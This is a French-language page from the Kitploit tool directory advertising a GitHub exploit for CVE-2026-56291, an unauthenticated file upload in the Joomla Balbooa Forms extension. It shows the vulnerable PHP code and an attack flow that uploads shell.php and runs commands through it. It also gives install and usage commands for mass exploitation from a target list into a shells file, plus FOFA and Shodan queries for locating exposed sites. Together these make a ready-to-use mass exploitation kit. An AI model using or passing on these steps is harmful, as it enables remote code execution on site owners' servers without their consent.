Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — Téléchargement de fichier non authentifié menant à RCE via form.uploadAttachmentFile | CVSS 9.8 | CISA KEV | Kitploit
Outils/GitHubGitHub/shinthink/cve-2026-56291
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — Téléchargement de fichier non authentifié menant à RCE via form.uploadAttachmentFile | CVSS 9.8 | CISA KEV

Voir le dépôt
22il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-56291 — Exploit RCE Massif Balbooa Forms Joomla

Pré-Auth form.uploadAttachmentFile → Pas de CSRF → Upload PHP


Aperçu

CVE-2026-56291 est une vulnérabilité critique (CVSS 9.8) de téléchargement arbitraire de fichier non authentifié dans l'extension Joomla Balbooa Forms (com_baforms) (< 2.4.1).

La tâche frontale form.uploadAttachmentFile n'appelle pas Session::checkToken() ni n'effectue aucune vérification de permission. Les fichiers téléchargés utilisent directement l'extension de l'attaquant : . Les fichiers aboutissent dans — directement exécutables en tant que PHP.

$fileName = $name . '.' . $ext
images/baforms/uploads/form-{id}/

Versions affectées

VersionStatut
1.0 – 2.4.0Vulnérable
2.4.1+Patché

CISA KEV: Ajouté le 10 juillet 2026 — exploitation active confirmée.


Mécanisme de la vulnérabilité

Cause racine

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

Flux d'attaque

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

Utilisation

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

Références

RessourceLien
CISA KEVcisa.gov/known-exploited-vulnerabilities
Détails du correctifmysites.guru
ChercheurPhil Taylor

Non affilié à Balbooa.

Télécharger l’outil